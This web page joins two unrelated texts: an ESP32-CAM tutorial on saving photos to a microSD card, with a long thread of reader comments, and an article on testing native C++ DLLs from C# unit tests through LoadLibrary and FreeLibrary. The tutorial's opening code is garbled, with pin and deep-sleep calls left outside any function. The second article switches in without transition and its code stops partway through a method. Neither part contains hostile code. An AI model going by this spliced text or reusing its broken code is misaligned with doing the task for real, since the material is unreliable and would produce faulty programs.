/*********
  Rui Santos
  Complete project details at
  IMPORTANT!!!
  - Select Board "ESP32 Wrover Module"
  - Select the Partition Scheme "Huge APP (3MB No OTA)"
*********/

#include <EEPROM.h>  // read and write from flash memory

// define the number of bytes you want to access
#define EEPROM_SIZE 1

// ESP32-CAM white on-board LED (flash) connected to GPIO 4
pinMode(4, OUTPUT);
digitalWrite(4, LOW);
rtc_gpio_hold_en(GPIO_NUM_4);

delay(2000);
Serial.println("Going to sleep now");
delay(2000);
esp_deep_sleep_start();
Serial.println("This will never be printed");
}

void loop() {
}

The code starts by including the necessary libraries to use the camera. We also include the libraries needed to interact with the microSD card:

#include "FS.h"      // file system wrapper
#include "SD_MMC.h"  // SD card driver

And the EEPROM library to save permanent data in the flash memory.

#include <EEPROM.h>

If you want to learn more about how to read and write data to the flash memory, you can follow the next tutorial:

Define the number of bytes you want to access in the flash memory. Here, we'll only use one byte, which allows us to generate up to 256 picture numbers.

#define EEPROM_SIZE 1

Then, define the pins for the AI-THINKER camera module. Note: you might need to change the pin definitions depending on the board you're using. Wrong pin assignments will result in a failure to init the camera.

Initialize an int variable called pictureNumber that will generate the photo name: picture1.jpg, picture2.jpg, and so on.

int pictureNumber = 0;

All our code is in the setup(). The code only runs once when the ESP32 wakes up (in this case, when you press the on-board RESET button). Configure the camera settings. Use the following settings for a camera with PSRAM (like the one we're using in this tutorial).
if(psramFound()){
  config.frame_size = FRAMESIZE_UXGA; // FRAMESIZE_ + QVGA|CIF|VGA|SVGA|XGA|SXGA|UXGA
  config.jpeg_quality = 10;
  config.fb_count = 2;
}

If the board doesn't have PSRAM, set the following:

else {
  config.frame_size = FRAMESIZE_SVGA;
  config.jpeg_quality = 12;
  config.fb_count = 1;
}

Initialize the camera:

// Init Camera
esp_err_t err = esp_camera_init(&config);
if (err != ESP_OK) {
  Serial.printf("Camera init failed with error 0x%x", err);
  return;
}

Initialize the microSD card:

//Serial.println("Starting SD Card");
if(!SD_MMC.begin()){
  Serial.println("SD Card Mount Failed");
  return;
}

uint8_t cardType = SD_MMC.cardType();
if(cardType == CARD_NONE){
  Serial.println("No SD Card attached");
  return;
}

More information about how to use the microSD card can be found in the following project:

The following lines take a photo with the camera:

camera_fb_t * fb = NULL;

// Take Picture with Camera
fb = esp_camera_fb_get();
if(!fb) {
  Serial.println("Camera capture failed");
  return;
}

After that, initialize the EEPROM with the size defined earlier:

EEPROM.begin(EEPROM_SIZE);

The picture number is generated by adding 1 to the current number saved in the flash memory.

pictureNumber = EEPROM.read(0) + 1;

To save the photo to the microSD card, create a path to your file. We'll save the photo in the main directory of the microSD card, and the file name is going to be picture1.jpg, picture2.jpg, picture3.jpg, etc…

String path = "/picture" + String(pictureNumber) + ".jpg";

These next lines open a file at that path on the microSD card and write the photo (the camera frame buffer) to it:

fs::FS &fs = SD_MMC;
File file = fs.open(path.c_str(), FILE_WRITE);
if(!file){
  Serial.println("Failed to open file in writing mode");
} else {
  file.write(fb->buf, fb->len); // payload (image), payload length
  Serial.printf("Saved file to path: %s\n", path.c_str());
}
file.close();

After saving a photo, we save the current picture number in the flash memory to keep track of the number of photos taken.

EEPROM.write(0, pictureNumber);
EEPROM.commit();

When the ESP32-CAM takes a photo, it flashes the on-board LED. After taking the photo, the LED remains on, so we send instructions to turn it off. The LED is connected to GPIO 4.
pinMode(4, OUTPUT); digitalWrite(4, LOW); rtc_gpio_hold_en(GPIO_NUM_4); Finally, we put the ESP32 in deep sleep. esp_deep_sleep_start(); Because we don’t pass any argument to the deep sleep function, the ESP32 board will be sleeping indefinitely until RESET. ESP32-CAM Upload Code To upload code to the ESP32-CAM board, connect it to your computer using an FTDI programmer. Follow the next schematic diagram: Important: GPIO 0 needs to be connected to GND so that you’re able to upload code. Important: some ESP32-CAM boards operate at 5V, so if you can’t upload code, you may need to power with 5V to make it work. To upload the code, follow the next steps: - Go to Tools > Board and select ESP32 Wrover Module - Go to Tools > Port and select the COM port the ESP32 is connected to - In Tools > Partition Scheme, select “Huge APP (3MB No OTA)“ - Press the ESP32-CAM on-board RESET button - Then, click the upload button to upload the code Important: if you can’t upload the code, double-check that GPIO 0 is connected to GND and that you selected the right settings in the Tools menu. You should also press the on-board Reset button to restart your ESP32 in flashing mode. Demonstration After uploading the code, remove the jumper that connects GPIO 0 from GND. Open the Serial Monitor at a baud rate of 115200. Press the ESP32-CAM reset button. It should initialize and take a photo. When it takes a photo it turns on the flash (GPIO 4). Check the Arduino IDE Serial Monitor window to see if everything is working as expected. As you can see, the picture was successfully saved in the microSD card. Note: if you’re having issues with the ESP32-CAM, take a look at our troubleshooting guide and see if it helps: ESP32-CAM Troubleshooting Guide: Most Common Problems Fixed After making sure that everything is working as expected, you can disconnect the ESP32-CAM from the FTDI programmer and power it using an independent power supply. 
To see the photos taken, remove the microSD card from the microSD card slot and insert it into your computer. You should have all the photos saved. The quality of your photo depends on your lighting conditions. Too much light can ruin your photos, and dark environments will result in many black pixels. We hope you’ve found this tutorial useful and that you are able to use it in your projects. If you don’t have an ESP32-CAM board, you can click here to get one. As mentioned previously, we have other tutorials about the ESP32-CAM that you may like: - ESP32-CAM Video Streaming and Face Recognition with Arduino IDE - ESP32-CAM Video Streaming Web Server (works with Home Assistant) - Quick Overview: ESP32-CAM with OV2640 Camera - Where to buy the ESP32-CAM Learn more about the ESP32 with our “Learn ESP32 with Arduino IDE” course or check our ESP32 free resources. Thank you for reading. 107 thoughts on “ESP32-CAM Take Photo and Save to MicroSD Card” Excellent job Rui, thanks for sharing this project. 73 de 9a3xz -Mikele You’re welcome. Regards, Sara The code works perfectly!! My problem now is: how can I send the image from the SD card as an email attachment by using the same esp32-cam? Please help me!! Hi. That’s one of our future projects (or similar). But at the moment, we don’t have any tutorial about that. Regards, Sara I’m also waiting for a tutorial on sending an email attachment from a photo on the SD card. Hi Malcom. That will be one of our future projects. But we don’t have it completed yet. Regards, Sara Hi dear; I would like to access saved SD card photos from a web browser. For example: I will connect a button to the board, press the button to take a photo and save it to the SD card as capture1.jpg, press again to save a second photo as capture2.jpg (only 2 photos recorded), then access address/capture1.jpg and address/capture2.jpg. How can I do it? Thanks for your kind support. Hi. At the moment, we don’t have any example about that. That will be one of our future projects. So, stay tuned!
Regards, Sara Very interesting project. I just want to ask: if I want to keep streaming using a web server, what should I do? This project streams and takes photos: The only part missing is saving the photo to the SD card. Maybe if you follow both tutorials you can make what you want. Regards, Sara Good! Congratulations!! I’m trying to find out how to make this, but instead of using reset to take a photo, programming a time-lapse photo, from 5 to 60 sec, storing them in the SD card. Can you think about it? Thanks! Hi Frank. That’s a very interesting project. I think you just need to create a timer that triggers a function that takes the photo and saves it to the microSD card. And put everything in the loop. I’ll think about your project, and maybe create a tutorial in the future. Regards, Sara Rui, I’m so sorry, I’m a radio man, not digital 🙂 When I try to compile this sketch, Arduino 1.8.5 tells me: Board esp32wrover (platform esp32, package esp32) is unknown Error compiling for board ESP32 Wrover Module. Hi Mikele. I’m sorry for the delay in my response. Were you able to fix this issue? What other information do you get in the serial monitor? Regards, Sara No no Sara, everything is ok…. Now I can compile the sketch and am waiting for the esp32-cam board from ebay, all is ok 😉 🙂 All the best for you and Rui, see you 😉 73 de 9a3xz-Mikele-Croatia Great! Thank you for following our work 😀 Hello Rui, I’m a great fan of your blog, and bought several of your books and courses. I found this post, if this can help for shutting down the LED: Also, I would like to build a system that takes a picture of an animal passing by a path. I was thinking to add an IR motion sensor or an external command by a light barrier to the SD card recording system you described. Could you please make a post of such a system? Thanks in advance, Claude Thank you for sharing that solution. At the moment, we weren’t able to interface the PIR sensor with the ESP32-CAM. But we’ll try again and create a new tutorial about that if we succeed.
Regards, Sara The LED pin output needs to be set LOW and then HOLD to keep it off during sleep. Disable HOLD after wakeup to use the pin again. pinMode(4, OUTPUT); digitalWrite(4, LOW); rtc_gpio_hold_en(GPIO_NUM_4); delay(500); esp_deep_sleep_start(); RTC & digital IO pin state can be maintained during hibernation with these two functions: rtc_gpio_hold_en rtc_cntl_dg_pad_force_hold More info: esp32.com/viewtopic.php?t=1966 Thanks for sharing. I’ve included the following: #include “driver/rtc_io.h” Then, used: rtc_gpio_hold_en(GPIO_NUM_4); to keep the GPIO LOW during deep sleep, as you suggested in your previous comment. It worked! So, I updated the code! Thank you 😀 Very nice! Could the sketch be modified to be triggered by connecting one of the GPIO pins to ground instead of pressing the reset button? This would make it useful in an application in which a remote switch is used to trigger it. Thanks, you guys make a cute couple I am struggling to get a PIR sensor to wake the esp32 from deep sleep. Is it possible the camera configuration is interfering with it? Thank you for your comment. We’ve tried interfacing the camera with the PIR motion sensor. But when using the SD card, there are almost no pins left to connect the PIR motion sensor. The pins left didn’t work with the sensor: the ESP32-CAM crashed. So, we weren’t successful yet in interfacing a PIR. But we will try again. Regards, Sara Instead of pressing the reset button, I would like to activate the camera by a movement sensor, for example, in order to watch the house… Thanks for an interesting project. Thank you for the suggestion. We’ll be working on something like that. Regards, Sara Good afternoon. Excellent example. But the author did not adjust the OV2640 sensor settings.
I added this code: // Set camera sensor sensor_t * s = esp_camera_sensor_get(); s->set_framesize(s, MY_FRAMESIZE); s->set_quality(s, MY_QUALITY); s->set_contrast(s, 0); s->set_brightness(s, 0); s->set_saturation(s, 0); s->set_gainceiling(s, GAINCEILING_16X); s->set_colorbar(s, 0); s->set_whitebal(s, 0); s->set_hmirror(s, 0); s->set_vflip(s, 0); s->set_ae_level(s, 0); s->set_special_effect(s, 0); s->set_wb_mode(s, 2); s->set_awb_gain(s, 1); s->set_bpc(s, 1); s->set_wpc(s, 1); s->set_raw_gma(s, 1); s->set_lenc(s, 0); s->set_agc_gain(s, 1); s->set_aec_value(s, 600); s->set_gain_ctrl(s, 0); s->set_exposure_ctrl(s, 0); s->set_aec2(s, 1); s->set_dcw(s, 0); all the pins i try seem to use as wake (ext0) seem to interrupt either the camera or the sd card 🙁 Thanks for this great tutorial. Could you explain how to connect external spi device (ex: tft ST7735) I have tryied multiple pin conbinaison without success. Hi. You need to check what pins are being used by the camera. You can’t use those. Then, if you’re using the microSD card, you can’t also use those pins. So, there are little pins left to connect an external SPI device. Take a look at the pins used by the board and see if you have some left that can be used with your peripherals. Here are the pins (page 3): loboris.eu/ESP32/ESP32-CAM%20Product%20Specification.pdf Regards, Sara Please let me know if you figure out what pins to use that dont cause a crash. I am having trouble getting the SD card to mount after deep sleep. Hi. You need to add rtc_gpio_hold_dis(GPIO_NUM_4); before initializing the microSD card, to “unhold” the state of GPIO 4. Regards, Sara Hello, very cool the design of the camera. Thank you for sharing another project and increasing our field of knowledge. Thank you 😀 In regards to waking after deep sleep and the SD card not mounting: The code you have posted forces GPIO4 to hold its value in this line: rtc_gpio_hold_en(GPIO_NUM_4); This pin is used for SD card interface. 
You need to un-hold it after deep sleep wakeup if you want to use the pin again. I used GPIO 13 (pin D3) to make the PIR sensor work. I also removed the light hold.. I would like the light to be off during deep sleep. When I figure it out I will post some pictures of what I rigged up if people want. Thanks again. Hi David. Yes, please share your results with us. Were you able to use GPIO 13 as an interrupt without the ESP crashing? Regards, Sara Of course. I use this code before deep sleep: esp_sleep_enable_ext0_wakeup(GPIO_NUM_13,1); cheers, David Here is a working link. This is a nice forum btw 🙂 Looking at it now, I am not sure what the 10k resistor does. I have tested it multiple times and it is definitely how I have it wired up though… Hi David. Thank you so much for sharing. I would like to give it a try and maybe create a tutorial about that. Can you share the code that you are running on the ESP32-CAM? You can use pastebin, for example, to share your code. Would you mind if we used that information to create a new tutorial? Regards, Sara Yes, of course, make a tutorial if you want. Honestly, though, I was unable to get the PIR sensor to work well in sunlight, but that may not be a problem for your project. Unfortunately I do not have the exact code on hand right now, but it is simply your code without the LED hold and with: esp_sleep_enable_ext0_wakeup(GPIO_NUM_13,1); I will make double sure that is right when I get home tomorrow morning. I was thinking of testing it again with a simple push button on the same pin just to be sure. Thanks, David Hello! I would like to disable the LED. How can I do that? Thanks During the flash while it takes a photo? I think you would need to edit the library that takes the photo with the ESP32-CAM Hello, I’ve managed to compile the sketch successfully in the IDE following your instructions, but I’m confused about loading it onto the ESP32.
How to power the ESP32 module please, because with the FTDI connected alone to USB, back pin 3.3V is around 4V and 5.0V is around 6V , Is the FTDI defective ? Or should the ESP32 powered with a separate power supply ? thanks for claryfying this point, Rgds, Hi. In our example, we’re powering the ESP32 using the 3.3V from the FTDI programmer connected to the 3.3V of the ESP32-CAM and it works well. Some people reported that the ESP32-CAM only worked well when powering with 5V through the 5V pin. You can also use a separated power supply up to 5V. Regards, Sara Hi.. can you helpme? SD 2G . Fat32 formated. like tutorial. the board works ok with the proyect (ESP32-CAM Video Streaming and Face Recognition) 18:57:51.475 -> Picture file name: /picture1.jpg 18:57:51.475 -> E (2403) sdmmc_cmd: sdmmc_read_sectors_dma: sdmmc_send_cmd returned 0xffffffff 18:57:51.475 -> E (2404) diskio_sdmmc: sdmmc_read_blocks failed (-1) 18:57:52.500 -> E (3409) sdmmc_req: sdmmc_host_wait_for_event returned 0x107 18:57:52.500 -> E (3409) sdmmc_cmd: sdmmc_read_sectors_dma: sdmmc_send_cmd returned 0x107 18:57:52.500 -> E (3410) diskio_sdmmc: sdmmc_read_blocks failed (263) Thanks. Solved. My mistake: call. pinMode(4, OUTPUT); digitalWrite(4, LOW); before take next image. in loop. I am not able to figure out what is the code that goes in to the loop, is there anyway that you can share it?. Thanks. Hello, Excellent article. Can the reset button be replaced by a PIR motion sensor? how to send photos from a memory card to the web or database, thank you Hi Wido. That will be one of our next projects. But at the moment, we don’t have anything about that subject. Regards, Sara The article says an a.i. thinker module is being used….but top of code say “Wrover”. Please explain? Thanks, Curt Wells Hi. In our first ESP32-CAM projects, the AI-thinker module wasn’t defined in the Boards menu at the time. Now, you should be able to find the AI-Thinker module on the Boards menu. 
However, you can select either board and it should work. Regards, Sara I tried to make the ESP32-CAM to wake up after some time (1 minute), I upload the sketch and put it to work. The first picture is taken by the ESP32-CAM, then it goes to sleep. When it wakes up, the ESP32-CAM tries to access the MicroSD Card and returns the message: E (7143) sdmmc_sd: sdmmc_check_scr: send_scr returned 0xffffffff SD Card Mount Failed But if I press Reset, it works normally (the picture is taken). Hi Eduardo. Try to add the following at the beginning of the setup(): pinMode(4, INPUT); digitalWrite(4, LOW); rtc_gpio_hold_dis(GPIO_NUM_4); Then, tell me if it solved your issue. Regards, Sara Fantastic Sara! It now works perfectly!!! You guys saved my sunday! Thank you very much! How can the brightness of the flash lamp (led) be changed ? Thanks In order to upload a photo to a server, how can a post request be added to one of the esp32-cam projects ? I know how to add a received file manager to the server, but all the examples I find with a google search use a client form to upload – which requires a human to select a file on the client. I have the same doubt from Curt Wells. The solution which I figured myself was to save the picture taken by the camera in the SPIFFS and show the picture in the web server. I’m using Ngrok to publish my web server on the internet and so far it’s working. Thanks Eduardo, Could you provide some more info on how to do this ? Curt I really sorry for doing that, but right now this is the only thing I can do… But by sunday or monday I can write some more neater and post on my github. I think that it won’t be difficult to get some help with the other guys in this weekend. Again, sorry for the mess. But I assure that it works (its working right now) Thanks very much Eduardo. I will study your code and I think I will learn some Portuguese too ! Hi Curt! As I promissed, I made something much more neater and uploaded to a repo in my github. 
You can download it, comment, ask for changes to the code, or whatever, in it. Feel free to post your questions there, I will answer them. For Rui and Sara: PLEASE, ERASE THE OTHER POST IN WHICH I PUT A VERY LONG CODE. THAT CODE IS A REAL MESS. ALSO, YOU CAN USE THE CODE I UPLOADED TO GITHUB FOR WHATEVER YOU WANT. AS YOU GUYS CAN SEE, MANY THINGS ARE DERIVED FROM THE CODE SHOWN IN RUI’S BOOK ‘LEARN ESP32 IN ARDUINO IDE’. Hi Eduardo. Thank you so much for sharing. We’ll take a look at your code and probably build a project about that. Regards, Sara Can anyone help me? How can I send the captured image from the SD card via email attachment? Hi, may I ask a question? Compilation stops with the error message below. “error: dl_lib.h: No such file or directory” Is there any solution? Thanks a lot. First try putting the header (dl_lib.h) in angle brackets: change #include “dl_lib.h” to #include <dl_lib.h>. If that doesn’t work, try commenting out the line: //#include “dl_lib.h”. For some people the first solution worked; for me, the second, without visible bad effects: the program works normally. I don’t know what function prototypes are in that header, since I don’t have it. It fails to compile with Arduino 1.8.9; here is the error message I get: Arduino: 1.8.9 (Linux), Board: “ESP32 Wrover Module, Huge APP (3MB No OTA), QIO, 80MHz, 921600, None” Build options changed, rebuilding all /home/david/Arduino/espcam/espcam.ino: In function ‘void setup()’: espcam:130:28: error: ‘rtc_gpio_hold_en’ was not declared in this scope rtc_gpio_hold_en(GPIO_NUM_4); ^ exit status 1 ‘rtc_gpio_hold_en’ was not declared in this scope This report would have more information with the “Show verbose output during compilation” option enabled in File -> Preferences. Arduino: 1.8.9 (Linux), Board: “ESP32 Wrover Module, Huge APP (3MB No OTA), QIO, 80MHz, 921600, None” I cannot find the problem. Can you help? Thank you for any help. David Nelson Good afternoon, dear Sarah. Could you please tell me two main points to operate the ESP32-CAM.
I’m interested in how to lower the flash power or turn it off? It is not the best, but the energy demands and the problem I have is that the flash does not go off at all sometimes! Also you can show me how from *FB the picture to break into arrays on 10 bytes in order that I could send them on UART? Please help as soon as possible. Hi Dimka. To turn off the flash: include the following library: #include “driver/rtc_io.h” Then, add this in your setup(): pinMode(4, INPUT); digitalWrite(4, LOW); rtc_gpio_hold_dis(GPIO_NUM_4); before going to sleep use to keep the LED off: pinMode(4, OUTPUT); digitalWrite(4, LOW); rtc_gpio_hold_en(GPIO_NUM_4); I hope this helps. At the moment I don’t have any example to break the picture into arrays. Regads, Sara I know I can disable the library: #include “driver/rtc_io.h” And the led will not work. Another question is did photos 200 pictures become black with ripples, what to do? Hi thanks a lot for spending time to complete this project and sharing it. I’m having an esp32 module an ov7670 module and an SD CARD MODULE. Can I connect all these three as per code and use your code. Or is this code only for esp32cam module? Hi. I believe that if you make the same connections between the camera and the sd card as they are in the ESP32-CAM, the code should work, but I haven’t tried it. Regards, Sara Hi, I have a problem compiling the sketch which is the following: C: \ Users \ Joelon \ Documents \ Arduino \ libraries \ esp32cam-master \ src / dl_lib.h: In function ‘char * dstrdup (str_t)’: C: \ Users \ Joelon \ Documents \ Arduino \ libraries \ esp32cam-master \ src / dl_lib.h: 232: 11: error: expected unqualified-id before ‘new’ str_t new = dalloc (len); ^ C: \ Users \ Joelon \ Documents \ Arduino \ libraries \ esp32cam-master \ src / dl_lib.h: 233: 29: error: expected type-specifier before ‘,’ token return (str_t) memcpy (new, s, len); Could you help me with this library or with this problem Thanks in advance 🙂 Hi Joel. 
Some readers suggested the following to solve that issue: “For dl_lib.h: No such file or directory, it is because ESP32 Board Version 1.03 doesn’t seem to include this anymore. Downgrade your ESP32 Board Version to 1.02 in the Arduino IDE, or comment out that line when using version 1.03”. I hope this helps. Regards, Sara Thank you Sara Santos 😉 This issue happened here a while ago, but I solved it in a much faster way than downgrading the “ESP32 boards” library. I don’t know why, but (at least in my Arduino IDE) the ESP32 boards list appears twice in the Tools>Board menu. When I chose the “AI Thinker ESP32-CAM” in the first menu, I got this error. Then, I chose this board in the second menu and, like magic, everything worked like a charm. Don’t ask me why, but it worked… Thank you Sara Santos 😉 Hello, I would like to know if it is possible, after taking the photo, not to send the esp32 to sleep, but instead to take more photos without the need to restart the esp32. Yes Joel, it’s possible! I already asked something like that and got answered here. I encapsulated the lines which take a picture in a function (see it below): void take_picture(){ digitalWrite(4, HIGH); //Turn on the flash camera_fb_t * fb = NULL; // FB pointer fb = esp_camera_fb_get(); if(!fb) { Serial.println(“Camera capture failed”); return; } // initialize EEPROM with predefined size EEPROM.begin(EEPROM_SIZE); pictureNumber = EEPROM.read(0) + 1; // Path where new picture will be saved in SD Card String path = “/foto_” + String(pictureNumber) + “.jpg”; // (save the photo to the SD card here, as in the tutorial) //Turn off the flash pinMode(4, OUTPUT); digitalWrite(4, LOW); } Then, in the loop() function, I asked it to call the take_picture() function every 60 seconds. void loop() { take_picture(); // Wait 1 min delay(60000); } Thanks Eduardo, I would like to know if you could help me with the complete sketch code 🙂 Hi Joel, You just need to copy the sketch presented in this tutorial here and delete the repeated lines which I encapsulated in the function.
Also, in the setup() function, delete these lines below: rtc_gpio_hold_en(GPIO_NUM_4); delay(2000); Serial.println(“Going to sleep now”); delay(2000); esp_deep_sleep_start(); Serial.println(“This will never be printed”); And nothing more! Rui and Sara did an excellent tutorial. Then you just need to upload the sketch and go ahead! Just let me know if you run into any trouble. Hi Eduardo ;), when I run the sketch, it prints on the serial port: “Camera capture failed” and does not save the photo to the SD card; in fact, I believe that it does not save it at all. I don’t know if you could help me with that ;). I’ll try to redo the tests I did before here. It’s been a while since the last time I did this test, but I’ll figure out everything again! Hi again Joel, As I promised, I built the circuit again and tested my sketch again. I have uploaded everything to this GitHub repo: As I said, I just made a slight change to Rui’s code. Now, it takes a picture and stays awake. It takes a picture every 60 seconds. I hope that now it will work! Thank you friend, the esp32 cam already works and takes the photos and saves them :), I send you a hug, take care You’re welcome! I’m glad that now it works. Any new ideas about how to extend this, feel free to ask or suggest. Just access the repo in the link that I sent before, and then open a new topic in the “Issues” tab (the tab beside the selected “Code” tab); You don’t have to worry about it. New ideas are always welcome! Hugs for you too and take care! I would like to know if there is a way to access the microSD from a web page
When I built it, I didn’t figure out any solution to work with many names and, so, when the ESP32-CAM took a picture, it overwrote the last one and showed on the web page only the newest one. You can check this project here: I understand Eduardo, let me check your project and if I can improve it I’ll tell you 🙂 I already reviewed your project, Eduardo, but I don’t know if you know whether there is any way to read the file in binary, send it to the server in an HTTP request, and decode it and save it on the server. Or some other way to do the same; I would appreciate any suggestions 🙂 Hi Joel, reading the pictures in binary and sending/receiving them in HTTP requests is a part beyond my knowledge… it is something on my wish list of next steps. If you know some place on the web that teaches this, I really will appreciate it! Unfortunately this time I can’t help nor give any hints… but if you need anything else which I know, or for which I can find a solution more easily, don’t hesitate to ask me! Hi, can I upload a photo to a cloud with the esp32 cam? Hi Gonzalo. Yes, you should be able to do that. But we don’t have that tutorial yet. Regards, Sara Thanks Sara. But do you know if I can do it just with an esp32, without a server like a Raspberry Pi? Thanks so much for sharing this. Your tutorials have been impactful. Great work. Thank you so much 😀. Again, a great tutorial! Code works fine…picture quality not the best, but I bet soon they’ll come up with a camera with more megapixels. Hi, I can’t include #include “esp_camera.h”, it tells me No such file or directory. What should I do? I’ve written to you several times. I use Arduino 1.8.10 and can’t find Huge App (3MB No OTA), but there is No OTA (Large APP); which one should I use? Thanks and congratulations for your wonderful and functional projects. Hi Federico. I don’t know what the problem can be. Have you selected the right board before trying to compile the code? Hello, yes, a Frenchman! (And in French.) First of all, THANK YOU for your very good tutorials! A small problem with dl_lib.h … which no longer exists: the new ESP32 Arduino version (v1.03) removes this file “dl_lib.h” (and some others). Depending on the sketch, probably you can just remove this line, because in the examples where I have used this library it is being included but no method or function from this file is used. Thanks for the tutorial! I did have a little trouble uploading my code to the ESP32, but after checking everything including the connections and ports, and checking the voltage, I checked it all! On the final check, I found it: sometime during all my checking, I crossed the TX & RX connections. I wouldn’t have found it if not for that final check. Thanks for what you do!
In the old days of code development, the developer would do several steps repeatedly: 1. edit the code 2. Save 3. Compile 4. Link 5. Deploy (if necessary) 6. Start (or switch to) the debugger 7. Start the app under the debugger. 8. Examine the code behavior changes with breakpoints and other debugger windows. This is quite tedious. Visual Studio does a lot to reduce these steps: Hit F5 and VS will automatically save, compile, link, deploy (usually), and start the debugger. But still, often it takes many repro steps or a long time to get the application to the target code. I really like TDD: Test Driven Development. Typically, the projects I work on consist of a Visual Studio Solution with multiple projects, and multiple project types. TDD allows me to execute the changed code much faster, and the code can be built in Release mode (so it’s much faster) and I don’t have to debug it: I just monitor the test log or test result. I spend a lot less time in the debugger or reproducing the steps to get to the code (Open a menu->Create a new Invoice, navigate to a line, enter a customer, etc.). The debugger is still able to step through the code, but it’s not really running the application, but just the target code. Plus, with TDD, when I’m done, the tests are the best defense mechanism for the code not breaking from another developer (or myself) changing the code later. The tests are also a great way for a new team member to get familiar with the code base and how it works. When I have a task to create some native code (C++) to add to the solution, I want to add tests of that native code to the existing C# or VB Test Projects. However, doing so requires a little fiddling to get it working. For example, if the test invokes the C++ code via P/Invoke (using DllImport) , then that code will be loaded into the test execution engine (e.g. “VsTest.executionEngine.x86.exe”) When I’m doing TDD, I want to quickly change the code and run the very fast test again. 
Can’t do that with TDD because the test execution process still has the DLL loaded, so you get an error message indicating that the code can’t be modified because it’s in use. You might think you could use a separate AppDomain to solve the problem, but that is cumbersome and works for managed DLLs only. Try out the code sample below. It uses LoadLibrary and FreeLibrary to load the native DLL directly, and allows you to change the code without needing to kill the execution process or restart VS. The sample target C++ code has a method called Return3 that just returns the integer 3. (I initially wanted to play around with regular expressions in C++). First, create a C# Test project: File->New->project->Visual C# ->Test->Unit Test Project Name it TestRegEx Build the project (Ctrl-Shift-B) Test->Window->Test Explorer This shows the default method “TestMethod1”, which we can run and it passes. Building results in the test being shown in Test->Windows->TestExplorer Now let’s add the C++ project: File->Add->New Project-> Visual C++->Win32 ->Win32 Project Name it CppRegEx In the wizard, choose Application Type: Dll, Finish. Paste in this code in CppRegEx.cpp: extern "C" int __declspec(dllexport) __stdcall Return3() { return 3; } In the CppRegEx project’s Post Build Event ((Right Click on CppRegEx project, Properties. For all configurations, Debug, Active, Release, or any you may have added) we want to copy the built native binary to where the test code can find it: xcopy /dy "$(TargetPath)" "$(SolutionDir)\TestRegEx" Because the command uses macros, it works for Debug and Release builds. Now build and the correct Dll will be copied to the Test folder. Now we need to add the C++ DLL as an item to the Test project that gets deployed, so it gets copied to the target directory. Right Click on the TestRegEx project->Add Existing Item, navigate to the build DLL in the TestRegEx folder, then change the Properties->Copy To OutputDirectory ->Copy If newer. 
Below is the full sample for the C++ target code and for the C# Test project. Try to modify the code and run the test. (Ctrl-R+T runs the test under the cursor; Ctrl-R+L repeats the last test run.) Now if you change the C++ code, the change is reflected in the test. (I’ve found that I have to manually invoke a C++ build (Ctrl-Shift-B) first. You can see the CPP file being compiled in the Output Window (Build panel).) I use this technique to try out various C++ code fragments. You can also debug into the native code: for the test project->Properties->Debug->Enable Native Code Debugging.

<C++ code>
// CppRegEx.cpp : Defines the exported functions for the DLL application.
//

#include "stdafx.h"
#include <regex>

extern "C" int __declspec(dllexport) __stdcall Return3()
{
    return 3;
}

using namespace std;

extern "C" int __declspec(dllexport) __stdcall ReturnRegEx(WCHAR *pString, WCHAR *pRegEx)
{
    wcmatch match;
    wstring str(pString);
    wregex reg(pRegEx);
    auto res = regex_match(pString, match, reg);
    return (int)res;
}

extern "C" int __declspec(dllexport) __stdcall ReturnRegExMany(int nIter, WCHAR *pString, WCHAR *pRegEx)
{
    int retval = 0;
    wcmatch match;
    wstring str(pString);
    wregex reg(pRegEx);
    for (int i = 0; i < nIter; i++)
    {
        auto res = regex_match(pString, match, reg);
        retval = (int)res;
    }
    return retval;
}
</C++ code>

<C# Test Code>
using System;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System.Runtime.InteropServices;
using System.IO;

namespace TestRegEx
{
    [TestClass]
    public class UnitTest1
    {
        [TestMethod]
        public void TestMethod1()
        {
            using (var x = new DynamicDllLoader("CppRegEx.dll"))
            {
                var res = NativeMethods.Return3();
                Assert.AreEqual(res, 3, "length not equal " + res.ToString());
            }
        }

        [TestMethod]
        public void TestRegEx()
        {
            using (var x = new DynamicDllLoader("CppRegEx.dll"))
            {
                var str = "igdasdf.dll";
                str = str.ToLowerInvariant();
                var regex = @"(^asdf(.*)|^fdsa (.*)|^fdasd(.*)|^fddd(.*))\.dll";
                var resNative = NativeMethods.ReturnRegEx(str, regex);
                var resManaged = System.Text.RegularExpressions.Regex.Match(str, regex);
                var resM = resManaged.Success ? 1 : 0;
                Assert.AreEqual(resNative, resM, "result not equal " + resNative.ToString());
                Assert.AreEqual(resNative, 1, "is false");
            }
        }

        [TestMethod]
        public void TestRegExLots()
        {
            using (var x = new DynamicDllLoader("CppRegEx.dll"))
            {
                var str = "igdasdf.dll";
                str = str.ToLowerInvariant();
                var regex = @"(^igd(.*)|^amd(.*)|^ati(.*)|^nv(.*))\.dll";
                var res = NativeMethods.ReturnRegExMany(10000, str, regex);
                //for (int i = 0; i < 1; i++)
                //{
                //    for (int j = 0; j < 10000; j++)
                //    {
                //        /*
                //        var resManaged = System.Text.RegularExpressions.Regex.Match(str, regex);
                //        /*/
                //        var resNative = NativeMethods.ReturnRegEx(str, regex);
                //        //*/
                //    }
                //}
            }
        }
    }

    static class NativeMethods
    {
        [DllImport("CppRegEx.dll")]
        public static extern int Return3();

        [DllImport("CppRegEx.dll", CharSet = CharSet.Unicode)]
        public static extern int ReturnRegEx(string somestring, string regex);

        [DllImport("CppRegEx.dll", CharSet = CharSet.Unicode)]
        public static extern int ReturnRegExMany(int iter, string somestring, string regex);
    }

    /// <summary>
    /// we want to load and free a native dll from a particular location.
    /// see
    /// </summary>
    public class DynamicDllLoader : IDisposable
    {
        private IntPtr _handleDll;

        public DynamicDllLoader(string fullPathDll)
        {
            if (!File.Exists(fullPathDll))
            {
                throw new FileNotFoundException("couldn't find " + fullPathDll);
            }
            _handleDll = LoadLibrary(fullPathDll);
            if (_handleDll == IntPtr.Zero)
            {
                throw new InvalidOperationException(
                    string.Format("couldn't load {0}. Err {1} ",
                        fullPathDll,
                        System.Runtime.InteropServices.Marshal.GetLastWin32Error()
                    )
                );
            }
        }

        private void UnloadDll()
        {
            if (_handleDll != IntPtr.Zero)
            {
                var res = 0;
                int nTries = 0;
                // Retry while FreeLibrary reports failure (it returns 0 on
                // failure); the condition here was inverted in the original.
                while ((res = FreeLibrary(_handleDll)) == 0)
                {
                    if (++nTries == 3)
                    {
                        throw new InvalidOperationException("Couldn't free library. # tries = " + nTries.ToString());
                    }
                }
                _handleDll = IntPtr.Zero;
            }
        }

        public void Dispose()
        {
